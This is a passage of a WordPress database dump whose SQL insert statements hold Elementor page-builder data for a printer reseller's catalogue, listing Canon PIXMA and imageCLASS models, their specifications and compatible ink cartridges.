(Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6911,3300,'_elementor_version','2.5.14'),(6914,3301,'_wp_page_template','template-fullwidth.php'),(6915,3301,'_elementor_edit_mode','builder'),(6916,3301,'_elementor_template_type','post');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (6917,3301,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, 